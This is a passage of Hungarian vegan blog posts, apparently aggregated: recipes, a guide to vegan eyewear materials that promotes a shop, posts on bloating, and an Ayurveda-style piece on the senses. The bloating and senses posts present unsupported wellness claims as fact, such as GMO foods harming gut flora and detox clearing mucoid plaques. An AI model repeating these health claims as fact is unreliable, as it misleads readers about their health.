üvegbe A magokat, gyümölcsöket beletöltjük az üvegbe (én itt egy kisebb, kb 3 dl-es üveget használtam), ráöntjük a növényi tejet, és éjszakára hűtőszekrénybe tesszük. A magok és aszalt gyümölcsök felpuhulnak reggelre és kitűnő reggelit kapunk. itt már ráöntöttem a mandulatejetReggelre megdagadt a chia mag, és a zab és a goji is megpuhult. Fogyasztás előtt legalább 1 órával érdemes kivenni a hidegről, ne együnk reggelire hűtőhideget :) Lehet enni az üvegből, én tányérba öntöttem, és öntöttem még rá mandulatejet, hogy még lédúsabb legyen. Vigyázat, nagyon laktató: a tányérban össze lehet keverni az összetevőket
Lehet a szemüvegem/napszemüvegem nem vegán? Útmutató a tudatos (nap)szemüveg-választáshoz
Ha fontos számodra, hogy mit képvisel, amit viselsz, olvasd el útmutatónkat a különböző alapanyagokról és gyártási módszerekről, amelyekkel a szemüveged készül. Itt a nyár és süt a nap, végre eljött az igazi napszemüvegszezon. Vízparton, városban vagy akár csak úgy is viselhetjük büszkén az új szerzeményünket. De mire figyeljünk, ha napszemüveget választunk? Műanyag Az árskála alján a jellemzően a Távol-Keletről származó fröccsöntött műanyag keretek találhatóak. A kőolaj (petróleum) alapú anyag magas hőmérsékleten, alumínium vagy acél öntőformában nyeri el végleges alakját, permetező festékkel és vegyszerekkel kezelik. A kőolaj bányászata és szállítása, valamint a műanyag előállítása is köztudottan terheli a környezetet. Előállítása tömeges és olcsó, emellett rendkívül sokféle módon lehetséges, így egyáltalán nem lehet kizárni, hogy állati eredetű összetevőt, jellemzően zsírokat is tartalmaz. Ami tetézi a bajt, hogy a gyártó a legtöbb esetben nehezen lenyomozható, így rákérdezni sem lehet. Ha a környezettudatosság fontos szempont, az olcsó műanyag a legrosszabb választás. Mi a helyzet a fém keretekkel? Népszerű és divatos választás a fém szemüvegkeret. Jellemzően vékonyabbak, kevesebb anyagból készülnek, így könnyűek, illetve van, aki az orrnál a papucsos illeszkedést preferálja. Ha ilyen keretet szeretnél, válassz acélból vagy titánból készült keretet. Mindkét fém újrahasznosítható, sőt a modern acél 60%-a újrahasznosított forrásból származik. A titán biokompatibilis, így nem okoz allergiás reakciót a bőrön, ezért használják számos orvosi eszköznél, és pl. szemüvegeknél is. Az acél gyártásához egyes esetekben állati eredetű zsírokat használnak, így ha tudsz, mindig kérdezz rá a gyártónál. Az acélhoz képest a titán előállítása kevesebb energiát emészt fel a, emiatt a többi fémhez képest környezetkímélőbb, emellett 100%-ig vegán is. (A titán egyik vegyülete, a titánium-dioxid sok cruelty-free konzmetikai termékben, sőt, sok sorozatban gyártott vegán élelmiszerben is benne van). A fa nem lehet nem vegán, ugye? Egyre több független gyártó készít fából szemüvegkeretet világszerte. A teljes egészében fából készült keretek természetesen megújuló forrásból származnak, és a nagy többségük (ha nem felületkezelték valamilyen ezt megakadályozó anyaggal) biológiailag lebomló. Két dolgot kérdezz meg minden esetben az eladótól/gyártótól, hogy használtak-e ragasztóanyagot az előállítása során, és ha igen, milyet. Ez azért fontos, mert az iparban használt gyakori faragasztó az enyv, ami állati eredetű, készítése során állatok csontjából és bőréből vonják ki a glutin nevű anyagot. A másik fontos kérdés, amit fel kell tenni, hogy milyen felületkezelő anyagot használtak. A fa szemüvegkereteket gyakran méhviasszal kezelik, amely vízhatlanságot és csillogást kölcsönöz a fának, de gyakran a méhek életébe kerül. 3D nyomtatott bioműanyag A kukoricakeményítőből vagy cukornádból készülő PLA (polylactic acid) bioműanyag 100%-ig vegán és környezetbarát alternatíva. Szállításával nem keletkezik károsanyag-kibocsátás, mivel a gyártás helyben történik. Megújuló forrásból származik és biológiailag lebomlik. Boltokban ilyet jelenleg nem találsz, de megrendelheted ITT. Forma V – Magyar gyártású, vegán, környezetbarát 3D nyomtatott napszemüveg a Vegán Optikától A préselt cellulóz-acetát A cellulóz-acetát (vagy ahogy a szemüvegiparban hívják, csak szimplán acetát) egy allergiát nem okozó, 100% növényi alapú műanyag. Kevesen tudják, hogy ez az anyag a 1940-es években váltotta le az előtte használt törékeny és problémás műanyagokat a prémium minőségű szemüveggyártásban. A ma kapható acetátok erősek, könnyűek és rugalmasak. A cellulóz-acetát átlátszósága és színválasztéka nagymértékben variálható. A komplexebb színezés több eltérő színű és átlátszóságú réteg egymásra préselésével oldható meg. A cellulóz-acetát az iparban használt műanyagoktól eltérően nem kőolaj alapú, hanem természetes anyagokból, gyapotból és farostból készül. A petróleum-alapú műanyagok terhelik a környezetet, az acetát nem, mert megújuló forrásból származik. Vegán környezetbarát napszemüveg, Jack&Francis KADE a Vegán Optikától A szemüvegekhez használt cellulóz-acetát a farost- és gyapotrétegek egymásra préselésével készül, az így létrejött nagy tömböket vékony szeletekre vágják majd CNC marógéppel kifaragják a szemüvegformát. Ezután következik a kifaragott szemüvegkeret és a szárak csiszolása, amely történhet kézzel vagy koptatógéppel is. Az alábbi videón láthatod, ahogy a CNC gép szemüvegkeretet farag: Mivel a növényi alapanyagok feldolgozása teljes egészében mechanikusan történik, elhanyagolható mennyiségű vizet és vegyszert használnak fel a gyártása során, így ha a boltok polcain meglátsz egy acetátból készült szemüveget, közel 100%-ig biztos lehetsz benne, hogy állati eredetű összetevőt sem tartalmaz. Amellett, hogy a cellulóz-acetát megújuló forrásból származik, alkalmas a biológiai bomlásra is. A leginkább fenntartható műanyagok közé tartozik, és ideális a szemüveggyártásra, mivel hipoallergén, megújuló anyagokból származik, biológiailag lebomlik, emellett könnyű és erős. A legtöbb közép- és felső kategóriás napszemüvegmárkának vannak acetát keretek a kínálatában. Összefoglalva, a fémkeretek kedvelői számára a legjobb választás a titán, amely vegán, biokompatibilis és a többi fémhez képest kevesebb energiát igényel gyártása során. A fakereteknél az enyvhasználatra és a méhviaszos kezelésre kell minden esetben rákérdezni. A boltokban kapható műanyag keretek közül pedig az acetát az, amely választásával a legtöbbet teszel a környezetedért. 100%-ig vegán acetát napszemüvegeket rendelhetsz a Vegán Optikában is. Slezák Balázs Források: https://www.veganoptika.hu/tudatos-vegan-szemuvegvalasztas http://www.solvay.com/en/binaries/Cellulose-Acetate_Brochure_en_low-170415.pdf https://www.fetcheyewear.com/blog/post/all-about-acetate http://ezermester.hu/cikk-2156/Valodi_faanyagokhoz_hasznaljunk_enyvet http://vegan.org/frequently-asked-questions/ http://www.popularwoodworking.com/techniques#slsearch-perfect-wax-finish The post Lehet a szemüvegem/napszemüvegem nem vegán? Útmutató a tudatos (nap)szemüveg-választáshoz appeared first on VegaNinja.
Fogyózók zabkásája
Májusban és júniusban az emberek, s különösen a nők nagy része fogyni akar. Munkahelyemen néhány nő is fogyókúrába kezdett egyenként. Az egyik pl. joghurtot eszik erdei gyümölccsel, ez számára a napi édesség, a másik igyekszik kevesebb szénhidrátot fogyasztani. Ami tetszik viszont, hogy végre, látom őket picit több folyadékot inni. Nem is ők a lényeg, hanem mindig az adott ember, jelen esetben Te, ha épp fogyni szeretnél. A következő reggelit ajánlom figyelmedbe, akkor is, ha nem szeretnél fogyni, csak valami finomban részesülni.
Röviden néhány indok, hogy miért segíthet a fogyásban ez a reggeli: A fenyőmag zsírsavjai egy ,,kolecisztokinin (rövidítve CCK; jelentése epehólyagmozgató) hormonnak köszönhetően kiválóan beindíthatják a fogyást, miközben jóllakottság érzést kelt. Ez a hormon emésztőrendszeri peptidhormon, amelynek elsődleges funkciója, hogy elősegítse a zsírok és fehérjék emésztését, emellett c sökkenti az étvágyat is. A kolecisztokinin az emésztés folyamatát és az étvágyat befolyásolja, csökkenti a gyomorkiürülés sebességét és visszafogja a gyomorsav termelődését.
Az agyban is megtalálható receptorain keresztül a kolecisztokinin pozitív hatással van a jóllakottságérzetre. Egyes források szerint mestersége beadása hányingert és szorongást is okoz, bár a különböző hosszúságú CCK-knak változó a hatása. Az éhségérzet csökkentését feltehetően a gyomor kiürülésének lassításával éri el.
A zabpehely rostforrásai szintén teltségérzetet okozhatnak. Az epernek alacsony a kalóriatartalma, és szintén jóllakottság érzést kelthet, ráadásul az eperben lévő mangán felgyorsíthatja az anyagcserét. Az áfonya, ahogy a zabpehely és az eper, szintén élelmi rostban gazdag, tehát szintén elősegíti a jóllakottság érzetet.
Forrás: ,,Untangling the effects of hunger, anxiety, and nausea on energy intake during intravenous cholecystokinin octapeptide (CCK-8) infusion Physiol. Behav. 65 (2), 303-10. o.
A recept
Hozzávalók:
- 1 adag zabpehely (pl. 1 bögre)
- víz
- 1/2 bögre áfonya
- 1/2 bögre felkarikázott epe
- 1/4 bögre fenyőmag
- Igény esetén: növényi tej (víz helyett)
- További édesítéshez igény esetén datolyaszirup vagy banán
Elkészítés:
Ha apró szemű zabpelyhünk van, akkor a lábosban, amiben főzni fogjuk, kicsit megpirítjuk. Épp, amíg illata lesz a pirítástól. Majd felöntjük vízzel. Figyelve és olykor megkeverve addig főzzük, míg a zabpehely meg puhul.
Ha nagy szemű zabpehellyel dolgozunk, akkor ugyanígy megpiríthatjuk, de egy éjszakára akár be is áztathatjuk hideg vízbe. Másnap pedig felfőzzük. Az ilyen zabpelyhek több főzési időt igényelnek.
Víz helyett és vízzel együtt (fele-fele arányban) is használhatunk valamilyen növényi tejet. Külön ízvilágot kölcsönöz reggelinknek.
Amíg fő a zabpehely (elég gyorsan elkészül), a gyümölcsöket megmossuk, felaprítjuk. Tálalásnál a zabkása tetejére halmozunk a gyümölcsökből, valamint megszórjuk némi fenyőmaggal.
Jobban édesíteni bizonyára nem mindenkinek szükséges, de akik még édesebb ízre vágynak, a zabkásába belekeverhetnek egy villával összetört banánt vagy a tetejére is datolyaszirupot csorgathatnak.
Vegán vagy, és puffad a hasad? – 2. rész
2017. május 31. Eszemiszom – Jóga Magazin
Tegnapi bejegyzésemben a puffadás alapvető okairól ejtettem szót, most pedig lássuk a gyakorlati tippeket: hogyan előzzük meg és szüntessük meg a puffadást, ha nem akarjuk feladni a vegán életmódot?
1. Együnk vegyszermentes növényeket! A növényvédőszerek ugyanis szintén kinyírják a bélflórát, a húsban és a tejben található antibiotikumokhoz hasonlóan. A GMO növények hasonlóan ártalmasak a bélflórára. Természetesen, ha éppen antibiotikumot vagy hormontartalmú gyógyszereket kell szednünk, ez is hazavágja a bélflórát, úgyhogy utána regenerálni kell.
2. Figyeljünk a bélflóránkra! Az alábbi ételek segítenek a bélflóra mihamarabbi regenerálásában, mivel a bélbaktériumok számára elengedhetetlen tápanyagokat tartalmaznak: banán, burgonya, bojtorján, cikória, pitypang-gyökér, articsóka, hagyma és fokhagyma. A bélflóra visszaépítése legalább egy vagy több hónapot fog igénybe venni.
3. Együnk kisebb adagokat! napi 4-6 kisebb adag étellel könnyebben megbirkózik a belünk, mint ha egyszerre sokat ennénk.
4. Rágjunk! Elvileg legalább 40-szer kellene megrágni minden falatot, de ha ez nem megy, tegyünk meg minden tőlünk telhetőt, hogy ne rágatlan étel jusson a gyomrunkba! Ne akarjuk elkapkodni az étkezést! Ez nem csak a tápanyagok jobb felszívódását fogja elősegíteni, hanem relaxál és elégedettséget is okoz.
5. Fogyasszunk probiotikumot! Kúraszerűen vagy akár rendszeresen is szedhetünk probiotikumokat, hogy megkönnyítsük a vastagbél-flóra kialakulását és fennmaradását!
6. Fogyasszunk enzimeket! Az enzimhiány egy külön terjedelmes téma, de maradjunk annyiban, hogy még a nyers vegánoknak is szükségük lehet néha természetes enzim-készítményekre, melyekkel megsegíthetik az emésztőrendszer munkáját.
7. Áztassunk! A magokat és gabonákat érdemes beáztatni egy éjszakára felhasználás előtt, sőt, többször is cserélhetjük rajta a vizet vagy csíráztathatunk is. Így csökkenthetjük ezen értékes tápanyagokban az emésztést nehezítő és gátló anyagok (lektin, fitin stb.) mennyiségét.
8. Kerüljük a káposztát! Eleinte érdemes kerülni a káposztát, kínai kelt és egyes retekfajtákat, ha erősen puffadunk tőlük. Később megpróbálhatjuk visszaépíteni az étrendbe, vagy fogyasszuk savanyítva, fűszerezve őket! A fekete retek például kifejezetten hasznos lehet. A vegán joghurtok, főleg ha cukrozottak, szintén nem ideálisak a bélflóra számára. Egyeseknek a szójával is körültekintően kell bánniuk.
9. Fogyasszunk detox teát! Természetesen nem kell mindenáron a legdrágább teát megrendelni, amit az Instagramon reklámoznak, otthon is elkészíthetünk egy ízletes és olcsó méregtelenítő teát a következő alkotóelemekből: Pu-erh tea, pitypang-gyökér, őrölt vaniliarúd, szárított rózsaszirom és nyers csokoládépor. A pu-erh teából kétszer annyit tegyünk hozzá, mint a többi összetevőből együtt. Minden nap érdemes iszogatni.
10. Ügyeljünk az ételek társítására! Bizonyos ételek könnyebben emésztődnek együtt, míg más ételek nehezebben, és ez a növények esetében is igaz. Bár most nem fogok belemenni részletesen az ételtársítás szabályaiba, álljon itt néhány étel, melynek fogyasztása ajánlott a puffadás megelőzésére: chia mag, quinoa, mazsola, citromos víz, friss bazsalikom, angol zeller, petrezselyem, római saláta, szőlő, ananász, sárgadinnye, kivi, banán, zöldborsó, cékla, édesburgonya, sütőtök, spárga, uborka, barnarizs, rozmaring, mentalevél.
Gauranga Das http://hotashtanga.com
Vegán vagy, és puffad a hasad? – 1. rész
2017. május 30. Eszemiszom – Jóga Magazin
Nem újdonság, hogy ha valaki sok feldolgozott élelmiszert és állati fehérjét fogyaszt, az elkezd hízni. Ennek több oka van, amit most nem részleteznék, mert korábban már sok szó esett róla. Nyilván a legalapvetőbb ok általában a túlzott kalória-bevitel és a mozgáshiányos életmód. Amikor valaki hall a vegán étrendről, és eldönti, hogy kipróbálja, általában fogyni szokott, de viszont sok esetben azt tapasztalja, hogy puffad a hasa (vékonybele) és sok gáz képződik a vastagbelében. Nos, a gázképződést nem nagyon lehet elkerülni, ha valaki magas rosttartalmú növényi étrenden él. A rostok egyes fajtái ugyanis a vastagbelünkben élő bélbaktériumok tápanyagaként szolgálnak, és amikor a baktériumok elfogyasztják a rostjaikat, akkor az anyagcseréjük során gázok keletkeznek.
Ezért is mondják azt a klíma-szakértők, hogy a szarvasmarha-tartás az egyik legerősebb üvegház-hatást kiváltó tényező a világon, mivel a kérődző állatok belében nagy mennyiségben keletkezik metángáz, és ezt pufogtatják kifelé az atmoszférába. Az ember bélrendszere természetesen nem igényel annyi növényt, mint a szarvasmarháé, és nem is termel annyi gázt, de attól még ez a tény megmarad, és erre fel kell készülni. legfejebb csökkenteni tudjuk a gázok mennyiségét az alább következő módszerekkel.
A puffadás azonban egy másik dolog. A legtöbbször a hüvelyesek, a káposztafélék és egyéb k-val kezdődő zöldségek, valamint egyes gyümölcsök fogyasztására reagál a szervezetünk puffadással, gázképződéssel. Nekem személy szerint csak addig volt puffadásom, amíg tejterméket is ettem a növények mellé. Most, hogy évek óta vegán vagyok, nem szokott felpuffadni a hasfalam, talán csak a nyers káposzta-hummusz kombinációtól, tehát az sem mindegy, hogy mit mivel eszünk. Vagyis azt tapasztaltam, hogy ha átállunk 100%-ban növényi étrendre, akkor a szervezetünk jobban adaptálódik a növények emésztéséhez, mintha vegyes üzemmódban tartjuk. De persze mindenkinek más az emésztése, azért nem biztos, hogy mások is ezt fogják tapasztalni. Sőt, az adaptáció éveket vehet igénybe.
A másik tényező a nyers/főtt ételek aránya az étrendünkben. Valamennyi nyers étel hasznos lehet, de a 100% nyersevészet a legtöbb ember számára nem válik be. És nem csak az átszokási időszakban, de hosszú távon is problémákat okozhat. Az áztatással, főzéssel, fűszerezéssel megkönnyítjük az emésztőrendszerünk dolgát. Egyes tudósok szerint azért nagyobb az agyunk, mint az emberszabású majmoknak vagy a szarvasmarhának, mert több energiát tudunk nyerni a főtt ételből a gondolkodásra, mintha egész nap csak füvet és leveleket kellene rágnunk. Nos, mit tehetünk annak érdekében, hogy megelőzzük a puffadást, ha szeretnénk fenntartani a vegán étrendünket?
Először is érdemes kivizsgáltatni az emésztőrendszerünk állapotát valamilyen holisztikus irányultságú orvossal, mert több olyan tényező is lehet, ami hozzájárul a puffadáshoz: például a gyomorsav hiánya, az inzulin-rezisztencia, az epekiválasztás elégtelensége, bélhurut, bélfekély, bélgyulladás (IBS), illetve az egyik leggyakoribb dolog: a megfelelő bélflóra hiánya. Ahogy fentebb írtam, az állati fehérjék és a feldolgozott élelmiszerek a kedvező bélbaktérkiumok ellenségei és a káros mikroorganizmusok, szabadgyökök barátai. Tehát nagyon kevés az olyan ember, akinek ép és egészséges a bélflórája. A széklet állaga és gyakorisága már önmagában erre utaló tényező lehet. Bár a magas rost-bevitel miatt a vegán étrend mellett több és gyakoribb a széklet, a hasmenés vagy nagyon gyakori széklet-ürítés már nem jó jel. Ugyanúgy a puffadást kísérő székrekedés sem az igazi.
Ha sikerült kiszűrni a lehetséges emésztőszervi betegségeket, akkor érdemes ráállni a méregtelenítésre. A méregtelenítés alatt elsősorban az emésztőrendszer nyálkahártyáin megtapadt félig megemésztett ételmaradványokat, nyálka-plakkokat, az oxidatív stresszből fakadó káros szabadgyököket értem, melyeket természetes módszerekkel is ki lehet vezetni. Tudom, hogy Zacher Gábor tiltakozna a “méregtelenítés” eme definíciója ellen, de szerintem nem csak az a méreg, ami azonnal megöl és megmérgez, hanem az is, ami évek hosszú sora alatt szép lassan teszi tönkre az egészségünket. A méregtelenítés után törekedjünk a bélflóra helyreállítrására, illetve a számunkra legjobban működő ételfajták és kombinációk kikísérletezésére, ami esetleg évekig is eltarthat. Itt nem csak az lesz a szempont, hogy a szervezetünk hogyan emészti meg ezt vagy azt az ételt, hanem az is, hogy mindent be tudjunk vinni a szervezetbe, amire szüksége van. A következő bejegyzésben konkrét tippeket fogok felsorolni a puffadás kiküszöbölésére.
Gauranga Das http://hotashtanga.com
Kókuszjoghurt
2017. május 27. Gitta nyersétel blogja
Sokáig vártam, amíg első kókuszjoghurtomat elkészítettem. Őszintén megvallva nem szeretem a kókusz ízét édességen kívül más ételekben. Persze a csokis kókuszos sütitől elvárom, hogy kókuszos legyen, de egy joghurttól nem! Néhány leírásban elég bonyolultnak tűnik az eljárás... és amíg el nem mondta Noémi (örök hálám érte), hogy ez tulajdonképpen milyen egyszerű, nem is fogtam hozzá. És milyen rosszul tettem! Nagyon finom! Azóta szinte mindig van itthon, az egész család szereti. (és Noémi joghurtját volt szerencsém meg is kóstolni, igazából ez adott kedvet hozzá, hogy én is megcsináljam. Az eredeti receptet itt találod Kókusz joghurt) Akkor lássuk: A joghurt alvasztással készített tejtermék. A tejet előzőleg joghurtkulturával oltják be, ezzel segítve a fermentálást. Ez a joghurtkultura nem más, mint jótékony baktériumok keveréke, melyek a tejben lévő cukrot lebontják tejsavvá. Ha növényi tejből készítünk joghurtot, akkor mindenképpen cukrot kell adni a tejhez, hiszen a növényi tejben nincs olyan cukor, amit a baktériumok szeretnek. Az élőflórás joghurt rendkívül egészséges, hiszen helyreállítja a bélflórát, így javítja az emésztést. Hozzávalók: 4 dl kókuszkrém (lehetőleg adalék és töltőanyagoktól mentes, 100% kókuszkivonatot tartalmazó kókuszkrémet használjunk, ilyen pl. a Banaban bio kókuszkrém) 1 evőkanál kókuszcukor (vagy agavé szirup, vagy más növényi szirup) 1 csapott kávéskanál agar agar por (vagy 1 evőkanál almapektin) + 1 dl víz 2 kapszula probiotikum vagy két evőkanál probiotikus ital* 1 steril befőttesüveg, steril kanál *Bármilyen probiotikus készítmény megfelel, pl. a Bio-Kult vagy JutaVit Probium, ezek kapszulák, de folyékony baktérium kultúrákat is használhatunk, mint pl. az Emocio vagy Imsyser, lényeg, hogy tartalmazzon lactobacillus bulgaricus és a streptococcus thermophilus-t, ugyanis a joghurt előállításában ez a két baktériumtörzs vesz részt. Előkészítés: A befőttesüveget és a kanalat alapos elmosogatás után forrásban lévő vízbe tesszük 1-2 percre, így már steril lesz - a steril környezet nagyon fontos a sérülékeny baktériumflórák számára. Elkészítés: A kókuszkrémet rázzuk fel, mielőtt kibontjuk, majd töltsük át a steril befőttesüvegbe, és szintén steril kanállal keverjük bele a kókuszcukorral vegyített probiotikumot. Az agar-agart forrásban lévő vízben folytonos keverés közben feloldjuk, pár percig hagyjuk hűlni, majd hozzákeverjük a kókuszkrémhez. Nem elég keverni, el kell turmixolni, hogy homogén legyen. Most jön az, hogy betesszük a 45 fokra beállított aszalógépbe, és 10-12 órán keresztül érleljük. Ha nincs aszaló, akkor jó a sütő, vagy ha nyár van, akkor kora délelőttől egészen estig a tűző napon. Erjesztés végén még folyékony a krém, össze kell jól rázni, keverni, és kis poharakba kiönteni, és mehet a hűtőszekrénybe. Ilyenkor áll össze, és lesz az a jellegzetes joghurt állaga. Vannak joghurtkészítő gépek, ezek elintézik a megfelelő hőfokot, csak a hozzávalókat kell összekeverni. Ennek gyakorlati kivitelezéséről tapasztalat hiányában nem tudok beszámolni.
Kesuhús sárgarépa rizzsel, kápia paprikával, petrezselyemmel
2017. május 25. Gitta nyersétel blogja
Kesuhús sárgarépa rizzsel és zöldséekkel A kesudió az egyik kedvencem. Finomak a rostjai, kitűnő kesutej készül belőle. Torták krémje, édességek elmaradhatatlan alapanyaga. Sós főételt ritkán csinálok kesudióból, arra ott van a többi dióféle, olajos mag, mint pl. a napraforgómag, dió, mandula, paradió, tökmag, stb... És most jön a kivétel... Most egy nagyon gyorsan elkészíthető, ugyanakkor brutál-finom főételt mutatok be, a kesuhúst. Kinézetre olyan, mint a rántott hús, ízre nem. Sokkal finomabb :) Hozzávalók: 10 dkg kesudió 2 evőkanál inaktív sörélesztő pehely fűszerek: füstölt ízű fűszerpaprika, bors, őrölt kömény, só 2-3 evőkanál tiszta víz A kesudiót a sörélesztő pehellyel és a fűszerekkel megőröljük, majd a víz hozzáadásával masszává gyúrjuk. Lapos szeleteket formázunk belőlük, és egy órát állni hagyjuk. Sárgarépa rizs: 3 szál sárgarépa 1 darabka zeller (ez magában is sós) Aprítógépben morzsásra aprítjuk a zöldségeket, és készen is van. Salátának kápia paprikát petrezselyemmel... (ezt így ettem én, de te bármilyen salátát tálalj hozzá :) )
Nyers vegán tortilla zöldségekkel, balzsamecettel
2017. május 24. Gitta nyersétel blogja
A nyers vegán tortilla lap tulajdonképpen aszalt alma és spenót pici sóval. Így egy picit édeskés, de rugalmas lapot kapunk, amit nagyon jól meg lehet tölteni, nézzétek csak: Nyers vegán tortilla 3 darab: 50 dkg alma, 10 dkg spenót pici só Mindent simára turmixolunk, és 3 részre osztjuk. Aszalógép tapadásmentes lapjára szép kis korongokat formázunk. 45 fokon kb 6 óra alatt szárazra aszaljuk. Rugalmas, picit édes, picit sós, remek alapja egy zöldség tekercsnek. Bármivel meg lehet tölteni, most az enyém következik: Megtöltöttem avokádóval, savanyú káposztával, saláta levelekkel, aszalt olajbogyóval, kápia paprikával, csírákkal. Feltekertem, és meglocsoltam modenai balzsamecettel... Avokádó és savanyú káposzta csírák olajbogyó és kápia paprika Feltekerjük és meglocsoljuk balzsamecettel így néz ki felvágva
Javítsd az érzékeid állapotát - érezz és tapasztalj többet a világból
2017. május 21. Élj harmóniában
Néhány héttel ezelőtt írtam egy bejegyzést arról, hogyan növelheted az életenergia szinted. A bejegyzésben a kitértem arra, hogy környezeti ártalmak miként befolyásolják, a bolygónkat és így hatással vannak az egészségedre és az energiaszintedre. . A bejegyezést itt olvashatod. Sokan nem tudják, de az ember szervezetére, azaz fizikai testére és a tudatára is minden hatással van ami a környezetedből érkezik. A különböző információkat a környezetedből az érzékszerveiden keresztül szerzed be, tapasztalod. Érzékelések: hallás, tapintás, látás, ízlelés, szaglás. Érzékszervek: fül, bőr, szem, nyelv, orr Az öt érzékszerv, öt kapu a test, tudat és lélek rendszeréhez. Az érzékszerveink folyamatosan vesznek fel információt a környezetből és adnak is le. Amikor valakinek tiszták, jók az érzékszervei, akkor nagyon sok mindent - köztük akár káros, kedvezőtlen dolgot - már előre ki tud szűrni, az érzékszervi tapasztalatoknak köszönhetően. (pl. egy kutya, mivel nagyon kifinomult a szaglása és a hallása, akkor amikor a gazdája még semmit nem érzékel, már elég messziről meg tudja állapítani, hogy egy idegen ember közeleg. Vagy ha valakinek jó a szaglása már előre érzi, hogy az étteremben felkínált étel esetleg nem friss, nem jó a szaga és meg sem eszi, míg egy másik ember akár elfogyasztja és utána beteg lesz tőle.) Az érzékeink állapota a tudatunk állapotának függvényében alakul. (Pl egy ember aki alkoholt fogyaszt, annak minden érzékszervi tapasztalata és a tudata is tompább lesz.) A világról alkotott képed, tapasztalataid elsődlegesen azon függnek, hogy Te milyennek látod a világot. Ha benned rend van, harmónia, kiegyensúlyozottság, akkor a világot is ilyennek fogod látni. Az érzékszerveiden keresztül érkező információ mind hatással van a tudatodra s ezáltal az életenergia szintedre és az érzékszerveid állapotára is - ahogy a táplálék is hatással van az emésztésedre, az energiaszintedre és a tested és tudatod állapotára. Ezért nagyon fontos, hogy a tudatodat kellemes, jó érzéseket okozó, erőt és lelkesedét adó, benyomásokkal tápláld. Amennyire csak lehet kerüld el a negatív, mérgező benyomásokat, mert ezek elvonják az életenergiádat. Javítsd az érzékszerveid állapotát! Amikor kellemes érzéki tapasztalatokra (samskar) teszel szert az kedvezően hat a tudatodra, elősegíti, hogy kiegyensúlyozott legyél, boldognak érezd magad és így növelheted a boldogság érzését és az életenergiád szintjét. Hallás A mai modern világban hihetetlen mennyi zajártalom éri az embereket. Sokan észre sem veszik egy hangos nagyvárosban élve, hogy milyen zajban telnek a napjaik. Sajnos a sok hangos, kellemetlen zaj túlterheli a hallórendszert és az idegrendszert is, ezáltal hozzájárul a szervezeted kimerítéséhez. Próbálj olyan helyen lakni, ami nem túl zajos. A lakást jól hangszigetelő ablakokkal szereld fel. A függönyök is tudnak segíteni abban, hogy kevesebb zaj szűrődjön be az ablakodon. A lakáson belül tölts több időt a lakás csöndesebb területén. Kerüld el a hangos filmnézést és zenehallgatást. Preferáld a megnyugtató jellegű filmeket, zenéket, amik kellemes lenyomatokat hagynak maguk után és nem terhelik túl az idegrendszered. Lefekvés előtt különösen fordíts nagy figyelmet, arra, hogy a szervezeted felkészülhessen a pihenésre. Kerüld el az esti filmezést és zenéből is csak valami nagyon harmonikus zenét hallgass. Tévére elaludni vagy zenehallgatás közben elaludni sajnos hatással lesz az alvásodra és az idegrendszered, a szervezeted nem tud megfelelően regenerálódni az éjszaka folyamán, ha közben folyamatosan valamilyen háttérzajt tapasztal. Ezt a kis videót Pilisben vettük fel - a Nagy Kevélyen. A szemnek szép látványt nyújt, de figyeld meg milyen érzést vált ki belőled a videó, ha a filmre hangot is teszel... Tapintás, érintés A tested felülete, a bőröd folyamatosan érintkezik a külvilággal. Nagyon fontos, hogy a bőröd szabadon tudjon lélegezni és kvázi információkat felvenni a környezetedből. Ennek érdekében hordj természetes anyagú ruhákat, kerüld el a szintetikus anyagokat, amik nem engedik a bőrödet megfelelően lélegezni. Használj bio, vegyszermentes kozmetikumokat, kerüld el a bőröd "megfullasztását" és mérgezését a nem tiszta minőségű testápolókkal, tusfürdőkkel, krémekkel. A bőröd érzéki tapasztalatihoz fontos, hogy az érzéseidet merd kimutatni és tudd elfogadni szeretteid közeledését is. Az érintés, ölelés, simogatás mind kellemes tapasztalatok a testednek és a lelkednek egyaránt, engedj gyakrabban teret ezeknek az interakcióknak. A bőrfelület az ájurvédában és minden ősi gyógyászatban nagyon nagy szerepet kap. A testeden számos energetikai pont van, amely megannyi testi funkcióval kapcsolódik össze. Ezen pontok megfelelő stimulációjával a testedben számos pozitív folyamat beindítható. A marma pontok stimulálása ( Kínai gyógyászatban akkupunktúra vagy akupresszúra) beindítják a szervezet öngyógyító képességeit és javítja a testi funkciókat. Az ájurvédában ezért nagyon fontos szerepe van a masszázsnak. A masszázs a fentiek miatt, segíti a testi funkcióid javítását, oldja a blokkokat, feszültségeket a testedből és elősegíti a testedben az életerő szabad áramlását. Az önmasszázs elvégzéséről egy korábbi bejegyzésben már írtam, itt olvashatod. Látás Mivel a legtöbb érzéki tapasztalatot a látásodon keresztül veszed fel, így a szemedet terheled túl legkönnyebben. A szem túlterhelése szemfájáshoz, fejfájáshoz, szemizmok rángásához vezethet és a szem túlterhelésével csökken az életenergia szinted is. Kerüld a számítógépezést, okostelefon használatát, filmnézést , mozizást, mert nem csak a szemedet, de az idegrendszeredet is túlterheli. Az egyik ismerősöm mesélte egyszer, hogy a 3 éves gyereke nem tud aludni, éjszaka sokat kel fel állandóan pörög. Majd a beszélgetés későbbi részében kezdte büszkén mesélni, milyen ügyesen kezeli a gyerek a tabletet. Mondtam neki, hogy szeretné, hogy a gyerek idegrendszere ne legyen túlterhelve és nyugodt legyen, akkor ne adjon a kezébe tabletet meg ilyeneket:) Este kerüld el a tévénézést, számítógépezést. Figyeld meg tudatosan, amikornem nézel tévét, nem pörgeted a facebook-ot vagy nem játszol a számítógépen vagy az okostelefonodon, mennyivel kiegyensúlyozottabb, nyugodtabb, türelmesebb vagy. A film nézés alkalmanként lehet akár egy jó kikapcsolódás, de nem jó ha napi rendszerességgel ilyen terhelésnek teszed ki az elmédet és a szervezetedet. Ahogy az sem jó ha valaki minden nap alkoholt iszik, mert abból egy idő után komoly problémája lesz. Mindent csak módjával:) Nézz olyan dolgokat, amik pozitív hatással vannak Rád. Sétálj az utcán és nézd meg az ég csodás kékjét, nézd meg a napfelkeltét, menj kirándulni és nézz csodás természeti tájakat. Ezek segítenek a szemed pihentetésében és hozzájárulnak az energiaszinted növeléséhez. Ízlelés Az ízek nagyon nagy hatással vannak a szervezetedre . Az ájurvéda 6 alapízt különböztet meg. Édes, savanyú, sós, csípős, keserű, fanyar. Ezek mind más más hatással rendelkeznek - bizonyos ízek fűtenek mások hűtenek, vannak amik segítik a testszövetek felépülését vannak amik a leépülést. Figyelj rá, hogy egy adott napon, minden íz előforduljon a táplálkozásodban. Ez segít abban, hogy az étkezésed nem csak változatos, de egészséges is legyen.Fűszerezz változatosan, táplálkozz ízletesen:) Az egyoldalúság és a túlzás soha nem jó. A fűszerek 